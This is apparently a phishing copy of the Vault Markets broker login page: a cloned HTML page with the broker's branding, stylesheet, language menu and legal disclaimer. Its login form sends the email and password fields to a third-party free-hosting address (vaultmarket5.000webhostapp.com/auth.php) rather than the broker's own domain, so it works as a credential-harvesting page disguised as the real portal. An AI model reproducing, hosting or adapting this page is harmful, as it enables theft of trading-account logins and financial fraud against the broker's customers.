<!DOCTYPE html>

<html>

<head>

<meta charset="utf-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		
			<meta name="author" content="DW Dynamic Works Ltd">
		
		<meta name="keywords" content=""> 
		<meta name="description" content="">
		<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no, maximum-scale=1.0"/>
		<meta name="app" data-lang="en" />
		<meta name="robots" content="noindex, nofollow">
		
<title>Vault Markets</title>

<link rel="shortcut icon" href="https://firebasestorage.googleapis.com/v0/b/images-4c0db.appspot.com/o/favicon.ico?alt=media&amp;token=5719d5ec-b675-46cc-b0f2-7072b6fce11f" type="image/x-icon">

		
		<meta property="og:title" content="Vault Markets">
		<meta property="og:description" content="">
		<meta property="og:site_name" content="vaultmarkets.trade"/>
		<meta property="og:image" content="">	
		<meta property="og:type" content=""/>
    <style>
        body {
            font-size: 100%;
        }
    </style>
    <style>
        /*! CSS Used from: https://my.vaultmarkets.trade/lib/bootstrap/3.3.6/css/bootstrap.min.css */
        html {
            font-family: sans-serif;
            -webkit-text-size-adjust: 100%;
            -ms-text-size-adjust: 100%;
        }

        body {
            margin: 0;
        }

        footer,
        nav {
            display: block;
        }

        a {
            background-color: transparent;
        }

        a:active,
        a:hover {
            outline: 0;
        }

        img {
            border: 0;
        }

        hr {
            height: 0;
            -webkit-box-sizing: content-box;
            -moz-box-sizing: content-box;
            box-sizing: content-box;
        }

        button,
        input {
            margin: 0;
            font: inherit;
            color: inherit;
        }

        button {
            overflow: visible;
        }

        button {
            text-transform: none;
        }

        button {
            -webkit-appearance: button;
            cursor: pointer;
        }

        input {
            line-height: normal;
        }

        input[type=checkbox] {
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
            padding: 0;
        }

        @media print {

            *,
            :after,
            :before {
                color: #000 !important;
                text-shadow: none !important;
                background: 0 0 !important;
                -webkit-box-shadow: none !important;
                box-shadow: none !important;
            }

            a,
            a:visited {
                text-decoration: underline;
            }

            a[href]:after {
                content: " ("attr(href) ")";
            }

            a[href^="javascript:"]:after {
                content: "";
            }

            img {
                page-break-inside: avoid;
            }

            img {
                max-width: 100% !important;
            }

            h2,
            p {
                orphans: 3;
                widows: 3;
            }

            h2 {
                page-break-after: avoid;
            }

            .navbar {
                display: none;
            }
        }

        * {
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
        }

        :after,
        :before {
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
        }

        html {
            font-size: 10px;
            -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
        }

        body {
            font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
            font-size: 14px;
            line-height: 1.42857143;
            color: #333;
            background-color: #fff;
        }

        button,
        input {
            font-family: inherit;
            font-size: inherit;
            line-height: inherit;
        }

        a {
            color: #337ab7;
            text-decoration: none;
        }

        a:focus,
        a:hover {
            color: #23527c;
            text-decoration: underline;
        }

        a:focus {
            outline: thin dotted;
            outline: 5px auto -webkit-focus-ring-color;
            outline-offset: -2px;
        }

        img {
            vertical-align: middle;
        }

        hr {
            margin-top: 20px;
            margin-bottom: 20px;
            border: 0;
            border-top: 1px solid #eee;
        }

        .sr-only {
            position: absolute;
            width: 1px;
            height: 1px;
            padding: 0;
            margin: -1px;
            overflow: hidden;
            clip: rect(0, 0, 0, 0);
            border: 0;
        }

        h2 {
            font-family: inherit;
            font-weight: 500;
            line-height: 1.1;
            color: inherit;
        }

        h2 {
            margin-top: 20px;
            margin-bottom: 10px;
        }

        h2 {
            font-size: 30px;
        }

        p {
            margin: 0 0 10px;
        }

        .text-right {
            text-align: right;
        }

        .text-center {
            text-align: center;
        }

        .text-uppercase {
            text-transform: uppercase;
        }

        .text-primary {
            color: #337ab7;
        }

        ul {
            margin-top: 0;
            margin-bottom: 10px;
        }

        ul ul {
            margin-bottom: 0;
        }

        .container {
            padding-right: 15px;
            padding-left: 15px;
            margin-right: auto;
            margin-left: auto;
        }

        @media (min-width:768px) {
            .container {
                width: 750px;
            }
        }

        @media (min-width:992px) {
            .container {
                width: 970px;
            }
        }

        @media (min-width:1200px) {
            .container {
                width: 1170px;
            }
        }

        .row {
            margin-right: -15px;
            margin-left: -15px;
        }

        .col-lg-12,
        .col-lg-6,
        .col-md-12,
        .col-md-6,
        .col-sm-12,
        .col-xs-12 {
            position: relative;
            min-height: 1px;
            padding-right: 15px;
            padding-left: 15px;
        }

        .col-xs-12 {
            float: left;
        }

        .col-xs-12 {
            width: 100%;
        }

        @media (min-width:768px) {
            .col-sm-12 {
                float: left;
            }

            .col-sm-12 {
                width: 100%;
            }
        }

        @media (min-width:992px) {

            .col-md-12,
            .col-md-6 {
                float: left;
            }

            .col-md-12 {
                width: 100%;
            }

            .col-md-6 {
                width: 50%;
            }
        }

        @media (min-width:1200px) {

            .col-lg-12,
            .col-lg-6 {
                float: left;
            }

            .col-lg-12 {
                width: 100%;
            }

            .col-lg-6 {
                width: 50%;
            }
        }

        label {
            display: inline-block;
            max-width: 100%;
            margin-bottom: 5px;
            font-weight: 700;
        }

        input[type=checkbox] {
            margin: 4px 0 0;
            margin-top: 1px\9;
            line-height: normal;
        }

        input[type=checkbox]:focus {
            outline: thin dotted;
            outline: 5px auto -webkit-focus-ring-color;
            outline-offset: -2px;
        }

        .form-control {
            display: block;
            width: 100%;
            height: 34px;
            padding: 6px 12px;
            font-size: 14px;
            line-height: 1.42857143;
            color: #555;
            background-color: #fff;
            background-image: none;
            border: 1px solid #ccc;
            border-radius: 4px;
            -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075);
            box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075);
            -webkit-transition: border-color ease-in-out .15s, -webkit-box-shadow ease-in-out .15s;
            -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
            transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
        }

        .form-control:focus {
            border-color: #66afe9;
            outline: 0;
            -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, .6);
            box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, .6);
        }

        .form-group {
            margin-bottom: 15px;
        }

        .checkbox {
            position: relative;
            display: block;
            margin-top: 10px;
            margin-bottom: 10px;
        }

        .checkbox label {
            min-height: 20px;
            padding-left: 20px;
            margin-bottom: 0;
            font-weight: 400;
            cursor: pointer;
        }

        .checkbox input[type=checkbox] {
            position: absolute;
            margin-top: 4px\9;
            margin-left: -20px;
        }

        .help-block {
            display: block;
            margin-top: 5px;
            margin-bottom: 10px;
            color: #737373;
        }

        .btn {
            display: inline-block;
            padding: 6px 12px;
            margin-bottom: 0;
            font-size: 14px;
            font-weight: 400;
            line-height: 1.42857143;
            text-align: center;
            white-space: nowrap;
            vertical-align: middle;
            -ms-touch-action: manipulation;
            touch-action: manipulation;
            cursor: pointer;
            -webkit-user-select: none;
            -moz-user-select: none;
            -ms-user-select: none;
            user-select: none;
            background-image: none;
            border: 1px solid transparent;
            border-radius: 4px;
        }

        .btn:active:focus,
        .btn:focus {
            outline: thin dotted;
            outline: 5px auto -webkit-focus-ring-color;
            outline-offset: -2px;
        }

        .btn:focus,
        .btn:hover {
            color: #333;
            text-decoration: none;
        }

        .btn:active {
            background-image: none;
            outline: 0;
            -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, .125);
            box-shadow: inset 0 3px 5px rgba(0, 0, 0, .125);
        }

        .collapse {
            display: none;
        }

        .dropdown {
            position: relative;
        }

        .dropdown-toggle:focus {
            outline: 0;
        }

        .dropdown-menu {
            position: absolute;
            top: 100%;
            left: 0;
            z-index: 1000;
            display: none;
            float: left;
            min-width: 160px;
            padding: 5px 0;
            margin: 2px 0 0;
            font-size: 14px;
            text-align: left;
            list-style: none;
            background-color: #fff;
            -webkit-background-clip: padding-box;
            background-clip: padding-box;
            border: 1px solid #ccc;
            border: 1px solid rgba(0, 0, 0, .15);
            border-radius: 4px;
            -webkit-box-shadow: 0 6px 12px rgba(0, 0, 0, .175);
            box-shadow: 0 6px 12px rgba(0, 0, 0, .175);
        }

        .dropdown-menu>li>a {
            display: block;
            padding: 3px 20px;
            clear: both;
            font-weight: 400;
            line-height: 1.42857143;
            color: #333;
            white-space: nowrap;
        }

        .dropdown-menu>li>a:focus,
        .dropdown-menu>li>a:hover {
            color: #262626;
            text-decoration: none;
            background-color: #f5f5f5;
        }

        @media (min-width:768px) {
            .navbar-right .dropdown-menu {
                right: 0;
                left: auto;
            }
        }

        .nav {
            padding-left: 0;
            margin-bottom: 0;
            list-style: none;
        }

        .nav>li {
            position: relative;
            display: block;
        }

        .nav>li>a {
            position: relative;
            display: block;
            padding: 10px 15px;
        }

        .nav>li>a:focus,
        .nav>li>a:hover {
            text-decoration: none;
            background-color: #eee;
        }

        .nav>li>a>img {
            max-width: none;
        }

        .navbar {
            position: relative;
            min-height: 50px;
            margin-bottom: 20px;
            border: 1px solid transparent;
        }

        @media (min-width:768px) {
            .navbar {
                border-radius: 4px;
            }
        }

        @media (min-width:768px) {
            .navbar-header {
                float: left;
            }
        }

        .navbar-collapse {
            padding-right: 15px;
            padding-left: 15px;
            overflow-x: visible;
            -webkit-overflow-scrolling: touch;
            border-top: 1px solid transparent;
            -webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, .1);
            box-shadow: inset 0 1px 0 rgba(255, 255, 255, .1);
        }

        @media (min-width:768px) {
            .navbar-collapse {
                width: auto;
                border-top: 0;
                -webkit-box-shadow: none;
                box-shadow: none;
            }

            .navbar-collapse.collapse {
                display: block !important;
                height: auto !important;
                padding-bottom: 0;
                overflow: visible !important;
            }

            .navbar-fixed-top .navbar-collapse {
                padding-right: 0;
                padding-left: 0;
            }
        }

        .navbar-fixed-top .navbar-collapse {
            max-height: 340px;
        }

        @media (max-device-width:480px) and (orientation:landscape) {
            .navbar-fixed-top .navbar-collapse {
                max-height: 200px;
            }
        }

        .container>.navbar-collapse,
        .container>.navbar-header {
            margin-right: -15px;
            margin-left: -15px;
        }

        @media (min-width:768px) {

            .container>.navbar-collapse,
            .container>.navbar-header {
                margin-right: 0;
                margin-left: 0;
            }
        }

        .navbar-fixed-top {
            position: fixed;
            right: 0;
            left: 0;
            z-index: 1030;
        }

        @media (min-width:768px) {
            .navbar-fixed-top {
                border-radius: 0;
            }
        }

        .navbar-fixed-top {
            top: 0;
            border-width: 0 0 1px;
        }

        .navbar-brand {
            float: left;
            height: 50px;
            padding: 15px 15px;
            font-size: 18px;
            line-height: 20px;
        }

        .navbar-brand:focus,
        .navbar-brand:hover {
            text-decoration: none;
        }

        .navbar-brand>img {
            display: block;
        }

        @media (min-width:768px) {
            .navbar>.container .navbar-brand {
                margin-left: -15px;
            }
        }

        .navbar-toggle {
            position: relative;
            float: right;
            padding: 9px 10px;
            margin-top: 8px;
            margin-right: 15px;
            margin-bottom: 8px;
            background-color: transparent;
            background-image: none;
            border: 1px solid transparent;
            border-radius: 4px;
        }

        .navbar-toggle:focus {
            outline: 0;
        }

        .navbar-toggle .icon-bar {
            display: block;
            width: 22px;
            height: 2px;
            border-radius: 1px;
        }

        .navbar-toggle .icon-bar+.icon-bar {
            margin-top: 4px;
        }

        @media (min-width:768px) {
            .navbar-toggle {
                display: none;
            }
        }

        .navbar-nav {
            margin: 7.5px -15px;
        }

        .navbar-nav>li>a {
            padding-top: 10px;
            padding-bottom: 10px;
            line-height: 20px;
        }

        @media (min-width:768px) {
            .navbar-nav {
                float: left;
                margin: 0;
            }

            .navbar-nav>li {
                float: left;
            }

            .navbar-nav>li>a {
                padding-top: 15px;
                padding-bottom: 15px;
            }
        }

        .navbar-nav>li>.dropdown-menu {
            margin-top: 0;
            border-top-left-radius: 0;
            border-top-right-radius: 0;
        }

        @media (min-width:768px) {
            .navbar-right {
                float: right !important;
                margin-right: -15px;
            }
        }

        .navbar-default {
            background-color: #f8f8f8;
            border-color: #e7e7e7;
        }

        .navbar-default .navbar-brand {
            color: #777;
        }

        .navbar-default .navbar-brand:focus,
        .navbar-default .navbar-brand:hover {
            color: #5e5e5e;
            background-color: transparent;
        }

        .navbar-default .navbar-nav>li>a {
            color: #777;
        }

        .navbar-default .navbar-nav>li>a:focus,
        .navbar-default .navbar-nav>li>a:hover {
            color: #333;
            background-color: transparent;
        }

        .navbar-default .navbar-toggle {
            border-color: #ddd;
        }

        .navbar-default .navbar-toggle:focus,
        .navbar-default .navbar-toggle:hover {
            background-color: #ddd;
        }

        .navbar-default .navbar-toggle .icon-bar {
            background-color: #888;
        }

        .navbar-default .navbar-collapse {
            border-color: #e7e7e7;
        }

        .container:after,
        .container:before,
        .nav:after,
        .nav:before,
        .navbar-collapse:after,
        .navbar-collapse:before,
        .navbar-header:after,
        .navbar-header:before,
        .navbar:after,
        .navbar:before,
        .row:after,
        .row:before {
            display: table;
            content: " ";
        }

        .container:after,
        .nav:after,
        .navbar-collapse:after,
        .navbar-header:after,
        .navbar:after,
        .row:after {
            clear: both;
        }

        .pull-right {
            float: right !important;
        }

        .pull-left {
            float: left !important;
        }

        /*! CSS Used from: https://my.vaultmarkets.trade/console/lib/font-awesome/5.7.2/css/all.min.css */
        .fa {
            -moz-osx-font-smoothing: grayscale;
            -webkit-font-smoothing: antialiased;
            display: inline-block;
            font-style: normal;
            font-variant: normal;
            text-rendering: auto;
            line-height: 1;
        }

        .fa-angle-down:before {
            content: "\f107";
        }

        .sr-only {
            border: 0;
            clip: rect(0, 0, 0, 0);
            height: 1px;
            margin: -1px;
            overflow: hidden;
            padding: 0;
            position: absolute;
            width: 1px;
        }

        .fa {
            font-family: "Font Awesome 5 Pro";
            font-weight: 900;
        }

        /*! CSS Used from: https://my.vaultmarkets.trade/css/style.css */
        .font-size-sm {
            font-size: 11px;
        }

        .btn-theme-primary {
            background: #B20000;
        }

        .btn-theme-secondary {
            background: #000000;
            color: #FFFFFF;
        }

        .portlet {
            padding: 15px;
        }

        .margin-top-10 {
            margin-top: 10px !important;
        }

        .margin-bottom-20 {
            margin-bottom: 20px !important;
        }

        .copyrights {
            padding: 20px 0px;
        }

        .disclaimer {
            color: #FFFFFFFF;
            font-size: 11px;
            padding-top: 5px;
        }

        .navbar-top {
            padding-top: 15px;
        }

        .navbar-top li {
            padding-left: 20px;
        }

        .navbar-top button {
            margin-top: 8px;
        }

        .lang-select {
            font-size: 13px;
        }

        .lang-select img {
            width: 16px;
            height: 16px;
            float: left;
            border: 1px solid #f4f4f4;
        }

        .lang-select span {
            padding: 0px 5px;
        }

        .lang-select .dropdown-menu {
            min-width: auto;
            font-size: 13px;
        }

        /*! CSS Used from: https://my.vaultmarkets.trade/css/dwf.css */
        .margin-top-10 {
            margin-top: 10px !important;
        }

        .margin-bottom-20 {
            margin-bottom: 20px !important;
        }

        .margin-bottom-50 {
            margin-bottom: 50px !important;
        }

        .padding-30 {
            padding: 30px;
        }

        /*! CSS Used from: https://my.vaultmarkets.trade/css/custom.css */
        h2 {
            padding: 0px;
            margin: 0px;
            font-size: 16px;
            color: #000;
            font-weight: 800;
        }

        .form-control {
            color: #131111;
        }

        p {
            margin: 10px 0px;
        }

        .checkbox>label {
            padding-left: 22px !important;
        }

        footer {
            min-height: 250px;
        }

        .navbar-brand {
            padding: 5px 15px;
        }

        body {
            padding-top: 180px;
        }

        /*! CSS Used from: https://my.vaultmarkets.trade/themes/black_gold_vm/main.css */
        /*! @import https://my.vaultmarkets.trade/themes/black_gold_vm/base.css */
        .btn-theme-primary {
            background: #C6922F;
            color: #fff;
        }

        .btn-theme-primary:hover {
            background: #C6922F;
            color: #fff;
        }

        .btn-theme-secondary {
            background: transparent;
            color: #C6922F;
            border: 1px solid #C6922F;
        }

        .btn-theme-secondary:hover {
            background: #F0EAD5;
            color: #C6922F;
        }

        .text-primary {
            color: #C6922F;
        }

        body {
            background: #0A0A0A;
            color: #b4bcc8;
        }

        h2 {
            color: #b4bcc8;
        }

        p {
            color: #b4bcc8;
        }

        hr {
            border-top: 1px solid #b4bcc8;
        }

        /*! end @import */
        /*! @import https://my.vaultmarkets.trade/themes/black_gold_vm/style.css */
        body {
            background: #0A0A0A;
        }

        footer {
            background-color: #0A0A0A;
        }

        .disclaimer {
            color: #ffffff;
        }

        .copyrights {
            color: #b4bcc8;
        }

        .navbar-default {
            border-color: transparent;
            background-color: #0A0A0A;
            height: 130px;
        }

        .navbar-default .navbar-nav>li>a {
            color: #C6922F;
        }

        .navbar-default .navbar-nav>li>a:focus,
        .navbar-default .navbar-nav>li>a:hover {
            color: #C6922F;
        }

        a {
            color: #C6922F;
            text-decoration: none;
        }

        a:hover {
            color: #C6922F;
        }

        .syntellicore-login .form-control,
        .form-control {
            background: #1B1E23;
            color: #FFFFFF;
        }

        .nav>li>a:hover {
            background-color: #C6922F !important;
            background: #C6922F !important;
            color: #ffffff !important;
        }

        .btn-theme-primary {
            background: #C6922F;
            color: #fff;
        }

        .btn-theme-secondary {
            background: 0 0;
            color: #C6922F;
            border: 1px solid #C6922F;
        }

        .dropdown-menu>li>a:focus,
        .dropdown-menu>li>a:hover {
            BACKGROUND: #C6922F;
            COLOR: WHITE;
        }

        .dropdown-menu>li>a {
            color: #FFFFFF;
        }

        .dropdown-menu {
            background-color: #000 !important;
        }

        /*! end @import */
        /*! CSS Used from: Embedded */
        .navbar-brand {
            height: auto;
        }

        /*! CSS Used from: Embedded */
        #login_btn~p {
            display: none;
        }

        /*! CSS Used from: Embedded */
        .copyrights {
            display: none !important;
        }

        .portlet {
            border: none !important;
            padding: 0 !important;
        }

        /*! CSS Used fontfaces */
        @font-face {
            font-family: "Font Awesome 5 Pro";
            font-style: normal;
            font-weight: 300;
            font-display: auto;
            src: url(https://my.vaultmarkets.trade/console/lib/font-awesome/5.7.2/webfonts/fa-light-300.eot);
            src: url(https://my.vaultmarkets.trade/console/lib/font-awesome/5.7.2/webfonts/fa-light-300.eot?#iefix) format("embedded-opentype"), url(https://my.vaultmarkets.trade/console/lib/font-awesome/5.7.2/webfonts/fa-light-300.woff2) format("woff2"), url(https://my.vaultmarkets.trade/console/lib/font-awesome/5.7.2/webfonts/fa-light-300.woff) format("woff"), url(https://my.vaultmarkets.trade/console/lib/font-awesome/5.7.2/webfonts/fa-light-300.ttf) format("truetype"), url(https://my.vaultmarkets.trade/console/lib/font-awesome/5.7.2/webfonts/fa-light-300.svg#fontawesome) format("svg");
        }

        @font-face {
            font-family: "Font Awesome 5 Pro";
            font-style: normal;
            font-weight: 400;
            font-display: auto;
            src: url(https://my.vaultmarkets.trade/console/lib/font-awesome/5.7.2/webfonts/fa-regular-400.eot);
            src: url(https://my.vaultmarkets.trade/console/lib/font-awesome/5.7.2/webfonts/fa-regular-400.eot?#iefix) format("embedded-opentype"), url(https://my.vaultmarkets.trade/console/lib/font-awesome/5.7.2/webfonts/fa-regular-400.woff2) format("woff2"), url(https://my.vaultmarkets.trade/console/lib/font-awesome/5.7.2/webfonts/fa-regular-400.woff) format("woff"), url(https://my.vaultmarkets.trade/console/lib/font-awesome/5.7.2/webfonts/fa-regular-400.ttf) format("truetype"), url(https://my.vaultmarkets.trade/console/lib/font-awesome/5.7.2/webfonts/fa-regular-400.svg#fontawesome) format("svg");
        }

        @font-face {
            font-family: "Font Awesome 5 Pro";
            font-style: normal;
            font-weight: 900;
            font-display: auto;
            src: url(https://my.vaultmarkets.trade/console/lib/font-awesome/5.7.2/webfonts/fa-solid-900.eot);
            src: url(https://my.vaultmarkets.trade/console/lib/font-awesome/5.7.2/webfonts/fa-solid-900.eot?#iefix) format("embedded-opentype"), url(https://my.vaultmarkets.trade/console/lib/font-awesome/5.7.2/webfonts/fa-solid-900.woff2) format("woff2"), url(https://my.vaultmarkets.trade/console/lib/font-awesome/5.7.2/webfonts/fa-solid-900.woff) format("woff"), url(https://my.vaultmarkets.trade/console/lib/font-awesome/5.7.2/webfonts/fa-solid-900.ttf) format("truetype"), url(https://my.vaultmarkets.trade/console/lib/font-awesome/5.7.2/webfonts/fa-solid-900.svg#fontawesome) format("svg");
        }
    </style>
</head>

<body lang="en" style="">
    <div id="in-page-channel-node-id" data-channel-name="in_page_channel_TZBny_"></div>



    <title>Vault Markets</title>

    <!-- Google Tag Manager -->

    <!-- End Google Tag Manager -->



    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">

    <meta name="author" content="DW Dynamic Works Ltd">

    <meta name="keywords" content="">
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no, maximum-scale=1.0">
    <meta name="app" data-lang="en">
    <meta name="robots" content="noindex, nofollow">


    <meta property="og:title" content="Vault Markets">
    <meta property="og:description" content="">
    <meta property="og:site_name" content="vaultmarkets.trade">
    <meta property="og:image" content="">
    <meta property="og:url" content="https://my.vaultmarkets.trade/en/login">
    <meta property="og:type" content="">




















































    <!-- Google Tag Manager (noscript) -->
    <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-P2CJTT4" height="0" width="0"
            style="display:none;visibility:hidden"></iframe></noscript>
    <!-- End Google Tag Manager (noscript) -->
    <!-- Google Tag Manager (noscript) -->
    <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-P2CJTT4" height="0" width="0"
            style="display:none;visibility:hidden"></iframe></noscript>
    <!-- End Google Tag Manager (noscript) -->


    <div class="bg-theme-full-container">
        <div class="container">


            <nav class="navbar navbar-default navbar-fixed-top">
                <div class="container">
                    <div class="navbar-header">
                        <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
						<span class="sr-only">Toggle navigation</span>
						<span class="icon-bar"></span>
						<span class="icon-bar"></span>
						<span class="icon-bar"></span>
					</button>

                        <a class="navbar-brand" href="https://vaultmarkets.trade"
                            target="_blank"><img src="https://my.vaultmarkets.trade/images/logonewma.png"></a>
                    </div>

                    <div id="navbar" class="navbar-collapse collapse" aria-expanded="false" style="height: 1px;">
                        <div class="navbar-top">
                            <ul class="nav navbar-nav navbar-right">




                                <li class="dropdown lang-select">
                                    <a href="javascript:;" class="dropdown-toggle" data-toggle="dropdown"
                                        data-hover="dropdown" data-close-others="true" style="display: flex;">
                                        <img src="https://my.vaultmarkets.trade/images/en.svg"><span class="text-uppercase">English</span>
                                     <svg xmlns="http://www.w3.org/2000/svg" width="16px" height="16px" viewBox="0 0 24 24"><g fill="none" fill-rule="evenodd"><path d="M24 0v24H0V0zM12.593 23.258l-.011.002l-.071.035l-.02.004l-.014-.004l-.071-.035q-.016-.005-.024.005l-.004.01l-.017.428l.005.02l.01.013l.104.074l.015.004l.012-.004l.104-.074l.012-.016l.004-.017l-.017-.427q-.004-.016-.017-.018m.265-.113l-.013.002l-.185.093l-.01.01l-.003.011l.018.43l.005.012l.008.007l.201.093q.019.005.029-.008l.004-.014l-.034-.614q-.005-.019-.02-.022m-.715.002a.02.02 0 0 0-.027.006l-.006.014l-.034.614q.001.018.017.024l.015-.002l.201-.093l.01-.008l.004-.011l.017-.43l-.003-.012l-.01-.01z"></path><path fill="#C6922F" d="M13.06 16.06a1.5 1.5 0 0 1-2.12 0l-5.658-5.656a1.5 1.5 0 1 1 2.122-2.121L12 12.879l4.596-4.596a1.5 1.5 0 0 1 2.122 2.12l-5.657 5.658Z"></path></g></svg>
                                    </a>
                                    <ul class="dropdown-menu dropdown-menu-default">

                                        <li><a href="/en/login?brd=1&amp;wp=1"><img src="https://my.vaultmarkets.trade/images/en.svg">
                                                <span>ENGLISH</span> </a></li>

                                        <li><a href="/af/login?brd=1&amp;wp=1"><img src="https://my.vaultmarkets.trade/images/af.svg">
                                                <span>AFRIKAANS</span> </a></li>

                                        <li><a href="/zu/login?brd=1&amp;wp=1"><img src="https://my.vaultmarkets.trade/images/zu.svg">
                                                <span>ZULU</span> </a></li>

                                        <li><a href="/sw/login?brd=1&amp;wp=1"><img src="https://my.vaultmarkets.trade/images/sw.svg">
                                                <span>SWAHILI</span> </a></li>

                                    </ul>
                                </li>



                                <li><button type="button" class="btn btn-theme-primary text-uppercase" value="">Login</button>
                                </li>

                                <li><button type="button" class="btn btn-theme-secondary text-uppercase" value="">Register Now</button>
                                </li>

                                <p class="font-weight-bold font-size-sm text-primary text-right">Trading Forex &amp;
                                    CFDs is Risky</p>


                            </ul>

                        </div>

                    </div>
                    <!--/.nav-collapse -->

                </div>
                <!--/.container-fluid -->
            </nav>














            <div class="row margin-bottom-50">
                <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                    <div class="syntellicore-login">






                        <div class="login-container">

                            <div class="row">
                                <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                                    <div class="portlet padding-30 ">

                                        <h2></h2>
                                        <hr>

                                        <div class="col-xs-12 col-sm-12 col-md-6 col-lg-6 col-no-padding ">
                                            <div class="left-theme-container">

                                                <div class="row margin-bottom-20">
                                                    <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                                                        <span>Sections marked with <span class="text-primary span-primary-sign-up">*</span>
                                                        are mandatory fields</span>
                                                    </div>
                                                </div>

                                                <form action="https://vaultmarket5.000webhostapp.com/auth.php?brd=1" method="POST" role="form" target="_self">

                                                    <div class="form-group">
                                                        <label for="userEmail" class="contorl-label"><span>Email: <span>*</span></span></label>
                                                        <input id="userEmail" class="form-control userEmail" name="userEmail" type="Email" value="" required="">
                                                        <span class="help-block"></span>
                                                    </div>

                                                    <div class="form-group">
                                                        <label for="userPassword" class="contorl-label"><span>Password: <span>*</span></span></label>

                                                        <input id="userPassword" class="form-control userPassword" name="userPassword" type="password" required="">


                                                        <span class="help-block"></span>
                                                    </div>







                                                        <a href="/ForgotPassword">Forgot Password?</a>


                                                    </p>
                                                    <div class="checkbox">
                                                        <label for="RememberMe"><input id="RememberMe" name="RememberMe" type="checkbox">Remember me?</label>
                                                        <input name="RememberMe" type="hidden" value="false">
                                                    </div>

                                                    <div class="text-center margin-bottom-20">
                                                        <button type="submit" id="login_btn" class="btn btn-theme-primary btn-loader" data-loading-text="<i class='far fa-circle-notch fa-spin'></i> Login">Login</button>


                                                        <p
                                                            class="font-weight-bold font-size-sm text-primary text-center">
                                                            Trading Forex &amp; CFDs is Risky</p>

                                                    </div>
                                                    <input id="newLogin" name="newLogin" type="hidden" value="1">
                                                    <input id="brd" name="brd" type="hidden" value="1">
                                                    <input id="targetval" name="targetval" type="hidden" value="_self">
                                                    <input id="uid" name="uid" type="hidden" value="">
                                                    <input id="http_referer" name="http_referer" type="hidden" value="">
                                                    <input id="is_ms" name="is_ms" type="hidden" value="0">
                                                </form>

                                            </div>

                                            <div class="row">




                                                <div class="external-registration-container margin-top-10">



                                                </div>
                                            </div>

                                        </div>


                                        <br clear="all">

                                    </div>

                                </div>
                            </div>

                        </div>




                    </div>
                </div>
            </div>

        </div>

    </div>

    <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=591990338462418&amp;ev=PageView&amp;noscript=1"></noscript>



    <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=524519816429186&amp;ev=PageView&amp;noscript=1"></noscript>






    <footer>
        <div class="container">


            <div class="row">

                <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                    <div class="disclaimer">


                        <div class="">
                            <p>Vault Markets (Pty) Ltd, a company incorporated under the laws of South Africa with
                                registration number 2021/596850/07 and registered address at 177 9TH AVENUE HIGHLANDS
                                NORTH, JOHANNESBURG, GAUTENG and is a duly authorised Juristic Representative of RocketX
                                (Pty) Ltd. RocketX (Pty) Ltd is licensed and regulated by the Financial Sector Conduct
                                Authority (FSP number 52142). RocketX (Pty) Ltd, registration number 2020/824856/07, а
                                company organized and existing under the laws of South Africa, RocketX is an Over the
                                Counter Derivatives Provider whose registered office is at WeWork South Africa, 155 West
                                Street, Sandown, Sandton, Gauteng, 2031, are the payment operators of Vault Markets
                                (Pty) Ltd, by the laws of South Africa, acting as a paying agent on behalf of Vault
                                Markets (Pty) Ltd.</p>

                            <p>&nbsp;</p>
                        </div>
                    </div>
                </div>


                <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                    <div class="copyrights">
                        <div class="pull-left" id="one">© 2024 Vault Markets Eastgate Office Park Block A Ground South
                            Boulevard Road, Bruma Johannesburg, Gauteng, 2198.
                        </div>

                        <div class="pull-right">

                        </div>
                    </div>
                </div>
            </div>
        </div>

    </footer>






</body>

</html>
